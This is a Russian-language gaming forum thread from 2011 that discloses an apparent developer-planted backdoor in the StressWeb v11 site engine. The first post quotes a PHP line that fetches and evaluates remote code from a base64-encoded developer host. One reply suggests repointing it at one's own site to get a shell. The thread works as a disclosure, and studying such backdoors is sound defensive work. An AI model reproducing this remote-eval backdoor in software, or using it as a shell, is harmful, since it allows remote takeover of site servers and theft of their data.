Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Уязвимость всех stressweb v11(нули и лицензии)

-

Статьи и описания по Lineage 2

- Статьи, квесты, карты и описания мира Lineage 2 в этом разделе

Ответ
 
Опции темы
Старый 06.10.2011, 18:28   #1
 Рыцарь
Аватар для lTheGeRo1Nel
 
lTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражания
Регистрация: 27.07.2010
Сообщений: 320
Популярность: 2317
Сказал(а) спасибо: 202
Поблагодарили 519 раз(а) в 271 сообщениях
Отправить сообщение для lTheGeRo1Nel с помощью Skype™
 
По умолчанию Уязвимость всех stressweb v11(нули и лицензии)





Итак, 2ая за сегодня найденная уязвимость в стресс вебе(stress web) v11. Данной уязвимости подвержены абсолютно все сайты, nulled и не nulled версий. Абсолютно любой сервер стоящий на stress web может быть взломан самим разработчиком

Мы все понимаем, что разработчик тоже должен кушать и стремиться к защите своих авторских прав, но подобное не допустимо в коде столь популярного продукта.

Вся беда в том, что данной уязвимости может быть подвержен даже лицензионный сайт и не важно платили вы или нет - ваша безопасность ровно на 1 уровне.



Ну теперь перейдем к самой уязвимости. Зашита она разработчиком, в классе PHPMailer, /inc/classes/class.phpmailer.php. Рассмотрим ее:

Код:
private function shBody(){return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif');}
Значение shHostname - aHR0cDovL25ldy5zdHJlc3N3ZWIucnUv, после base64_encode принимает значение: [Ссылки могут видеть только зарегистрированные пользователи. ]

Вызывается эта функция вот так: PHPMailer::startSh()[псевдолинки shIsAuth()->shEval()->shBody()].

В результате, если владелец stressweb по адресу new.stressweb.ru/sh.gif разместит вредоностный код, он сможет быть исполнен АБСОЛЮТНО НА ЛЮБОМ сайте с веб-обвязкой stressweb, абсолютно не важно, есть там лицензия или ее нет.

А теперь реальный пример - захотел наш "stressweb" убить 1 фришку, заложил вредоностный код на своем сайте в sh.gif и пошел вайпить чей то сервер, умные ребятки в это время заметили этот код и пошли вайпить то, что они захотят ... или получать доступ к базам/конфигам и прочему. Вот вам яркий пример халатности разработчика









Автор статьи: [Ссылки могут видеть только зарегистрированные пользователи. ]

Последний раз редактировалось lTheGeRo1Nel; 07.10.2011 в 10:02.
  Ответить с цитированием
2 пользователя(ей) сказали cпасибо:
Jumper (08.10.2011), misha84 (06.10.2011)
Старый 06.10.2011, 19:10   #2
 Капитан
Аватар для Excellent18rus
 
Excellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе ценуExcellent18rus знает себе цену
Регистрация: 07.04.2010
Сообщений: 293
Популярность: 4393
Сказал(а) спасибо: 133
Поблагодарили 334 раз(а) в 187 сообщениях
Отправить сообщение для Excellent18rus с помощью ICQ
 
По умолчанию Re: Уязвимость всех stressweb v11(нули и лицензии)

а нам то что с этого ?
как ее юзать?
бестолковая какая-то тема)
  Ответить с цитированием
Старый 06.10.2011, 19:13   #3
 Рыцарь
Аватар для lTheGeRo1Nel
 
lTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражанияlTheGeRo1Nel блестящий пример для подражания
Регистрация: 27.07.2010
Сообщений: 320
Популярность: 2317
Сказал(а) спасибо: 202
Поблагодарили 519 раз(а) в 271 сообщениях
Отправить сообщение для lTheGeRo1Nel с помощью Skype™
 
По умолчанию Re: Уязвимость всех stressweb v11(нули и лицензии)

Цитата:
Сообщение от Excellent18rusПосмотреть сообщение
а нам то что с этого ?
как ее юзать?
бестолковая какая-то тема)

Честно скачать я тоже не силён в php. Но думаю кто знает php, поймёт что с этим делать)
  Ответить с цитированием
Старый 06.10.2011, 19:25   #4
 Разведчик
Аватар для gfhrfghfg
 
gfhrfghfg вызывает надежду
Регистрация: 15.05.2010
Сообщений: 1
Популярность: -24
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Уязвимость всех stressweb v11(нули и лицензии)

практически не как ее юзать, но есть одно условие при котором возможно заюзать-->читайте коменты Зена и Артёмки
  Ответить с цитированием
Старый 08.10.2011, 21:31   #5
 Пехотинец
Аватар для revi994
 
revi994 никому не известный тип
Регистрация: 23.05.2010
Сообщений: 55
Популярность: 1
Сказал(а) спасибо: 67
Поблагодарили 112 раз(а) в 34 сообщениях
Отправить сообщение для revi994 с помощью ICQ Отправить сообщение для revi994 с помощью Skype™
 
По умолчанию Re: Уязвимость всех stressweb v11(нули и лицензии)

Можно сделать нулл и впихнуть туда свой сайт и будет как шелл.
________________
Я та-а-к быстро вспомнил о чем забыл, что забыл о чём вспомнил
[Ссылки могут видеть только зарегистрированные пользователи. ]
  Ответить с цитированием
Пользователь сказал cпасибо:
Jumper (09.10.2011)
Старый 11.10.2011, 17:01   #6
Заблокирован
 Разведчик
Аватар для BlackDevilIV
 
BlackDevilIV на правильном путиBlackDevilIV на правильном пути
Регистрация: 18.06.2010
Сообщений: 2
Популярность: 103
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 2 сообщениях
 
По умолчанию Re: Уязвимость всех stressweb v11(нули и лицензии)

Тоесть если эта CMS на одном из крупных проектов разработчики этой CMS могут запросто слить базу или использовать в своих целях?! За такое их карать надо
  Ответить с цитированием
Старый 12.10.2011, 00:48   #7
 Пехотинец
Аватар для immortal :D
 
immortal :D скоро будет известенimmortal :D скоро будет известенimmortal :D скоро будет известенimmortal :D скоро будет известен
Регистрация: 22.04.2010
Сообщений: 86
Популярность: 313
Сказал(а) спасибо: 135
Поблагодарили 87 раз(а) в 59 сообщениях
 
По умолчанию Re: Уязвимость всех stressweb v11(нули и лицензии)

Карать не нужно,всё правильно разрабы сделали.
Сервера с лицензий им нет смысла трогать)
А вот тех,кто использует нуллы,могут наказать
  Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Уязвимость] Небольшая уязвимость с навыками от всех дизайнов.... sorr Общение и обсуждение 22 26.10.2011 01:19
Статистика на StressWeb 8.0 CrHD Вопросы и ответы, обсуждения 8 20.09.2010 11:58
[Баг] StressWeb vlaha Подполье Lineage 2 (0 уровень) 5 18.09.2010 14:11

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 20:48.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net